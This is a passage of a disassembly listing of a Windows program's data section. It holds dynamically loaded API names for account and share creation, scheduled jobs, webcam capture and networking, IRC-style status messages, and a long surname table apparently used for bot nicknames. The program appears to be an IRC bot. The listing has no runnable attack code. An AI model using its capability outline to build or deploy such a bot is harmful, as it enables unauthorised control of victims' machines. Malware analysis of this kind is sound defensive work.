aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409E0C:loc_40A211�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409E0C:loc_40A239�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409E0C+43E�o
align 10h
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409E0C+446�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409E0C+453�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409E0C+460�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409E0C+46D�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409E0C+47A�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_409E0C+487�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409E0C+494�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409E0C+4A1�o
align 10h
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409E0C+514�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409E0C+525�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409E0C+52D�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409E0C+53A�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409E0C+547�o
align 4
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409E0C+554�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409E0C+561�o
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409E0C+56E�o
align 4
aSocket db 'socket',0 ; DATA XREF: sub_409E0C+57B�o
align 4
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409E0C+588�o
; .data:00455CBC�o
aConnect db 'connect',0 ; DATA XREF: sub_409E0C+595�o
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409E0C+5A2�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409E0C+5AF�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_409E0C+5BC�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_409E0C+5C9�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_409E0C+5D6�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_409E0C+5E3�o
align 10h
aSend_1 db 'send',0 ; DATA XREF: sub_409E0C+5F0�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_409E0C+5FD�o
align 10h
aRecv db 'recv',0 ; DATA XREF: sub_409E0C+60A�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409E0C+617�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_409E0C+629�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_409E0C+631�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_409E0C+63E�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_409E0C+64B�o
align 4
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409E0C+658�o
align 10h
aGetsockname db 'getsockname',0 ; DATA XREF: sub_409E0C+665�o
aGethostname db 'gethostname',0 ; DATA XREF: sub_409E0C+672�o
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409E0C+67F�o
align 4
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409E0C+68C�o
align 4
aGetpeername db 'getpeername',0 ; DATA XREF: sub_409E0C+699�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_409E0C+6A6�o
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409E0C:loc_40A5EB�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409E0C+7F0�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409E0C+7F8�o
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409E0C+805�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409E0C+812�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409E0C+81F�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409E0C+82C�o
align 10h
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409E0C+839�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409E0C+846�o
align 4
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409E0C+853�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409E0C+860�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409E0C+8D2�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409E0C:loc_40A70B�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409E0C+90C�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409E0C+914�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409E0C+921�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409E0C:loc_40A76A�o
align 4
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409E0C+96F�o
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409E0C+977�o
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409E0C+984�o
align 10h
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409E0C+991�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409E0C+99E�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409E0C+9AB�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409E0C+9B8�o
align 4
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409E0C+9C5�o
align 10h
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409E0C+9D2�o
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409E0C+9DF�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409E0C+9EC�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_409E0C+9F9�o
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409E0C:loc_40A886�o
align 10h
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409E0C+A87�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409E0C+A8F�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409E0C:loc_40A8D0�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409E0C+AD1�o
align 4
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409E0C+AD9�o
align 4
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409E0C:loc_40A91A�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409E0C+B1B�o
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409E0C+B23�o
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409E0C+B30�o
align 4
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409E0C+B3D�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409E0C:loc_40A98E�o
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409E0C+B8F�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409E0C+B97�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409E0C:loc_40A9D8�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409E0C+BD9�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409E0C+BE1�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409E0C+BEE�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409E0C+BFB�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409E0C+C08�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409E0C+C15�o
align 4
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409E0C:loc_40AA76�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409E0C+C77�o
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409E0C+C7F�o
align 4
; char aKernel32_dllFa[]
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+28�o
align 4
; char aUser32_dllFail[]
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+5C�o
; char aAdvapi32_dllFa[]
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+90�o
align 4
; char aGdi32_dllFaile[]
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+C4�o
align 4
; char aWs2_32_dllFail[]
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+F8�o
; char aWininet_dllFai[]
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+12C�o
align 4
; char aIcmp_dllFailed[]
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+160�o
align 10h
; char aNetapi32_dllFa[]
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+194�o
align 4
; char aDnsapi_dllFail[]
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+1C8�o
; char aIphlpapi_dllFa[]
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+1FC�o
align 10h
; char aMpr32_dllFaile[]
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+230�o
align 4
; char aShell32_dllFai[]
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+264�o
align 4
; char aOdbc32_dllFail[]
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+298�o
; char aAvicap32_dllFa[]
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40AAC8+2CC�o
align 4
; char asc_445258[]
asc_445258 db '-' ; DATA XREF: sub_40AAC8+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
a__9: ; DATA XREF: .text:0040AE28�o
unicode 0, <.>,0
a__10: ; DATA XREF: .text:0040AE40�o
unicode 0, <.>,0
unk_445280 db 2Dh ; - ; DATA XREF: sub_40AEC5+8C�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
; char asc_4452AC[]
asc_4452AC db '-' ; DATA XREF: sub_40AEC5:loc_40AF58�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 4
unk_4452DC db 2Dh ; - ; DATA XREF: sub_40AEC5:loc_40AF1E�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 10h
unk_445300 db 2Dh ; - ; DATA XREF: sub_40AEC5:loc_40AF8A�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 10h
; char asc_445330[]
asc_445330 db '-' ; DATA XREF: sub_40AEC5+43�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGetting_0 db 'error getting ARP cache: %d',0 ; DATA XREF: .data:00455AF8�o
; .data:00455EB4�o
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AFA9+46�o
aReal db 'real',0
align 10h
dd 0
dword_445374 dd 0 ; DATA XREF: sub_40B487+7�o
off_445378 dd offset sub_40B0A2 ; DATA XREF: sub_40B487+49�r
aConst db 'const',0
align 8
dd 1
dd offset sub_40B10F
aLetter db 'letter',0
align 4
dd 0
dd 2
dd offset sub_40B16D
aComp db 'comp',0
align 10h
dd 3
dd offset sub_40B1BA
aCountry db 'country',0
dd 0
dd 4
dd offset sub_40B260
dd 736Fh, 2 dup(0)
dd 5
dd offset sub_40B2D5
off_4453E0 dd offset aAbdulrazak ; DATA XREF: sub_40B0A2+21�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
off_4453EC dd offset aAddison ; DATA XREF: sub_40B487+39�o
; "Addison"
dd offset aAdelstein ; "Adelstein"
dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer_0 ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
off_445750 dd offset aCiampaglia ; DATA XREF: .data:off_44B5D8�o
; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton_0 ; "Compton"
dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
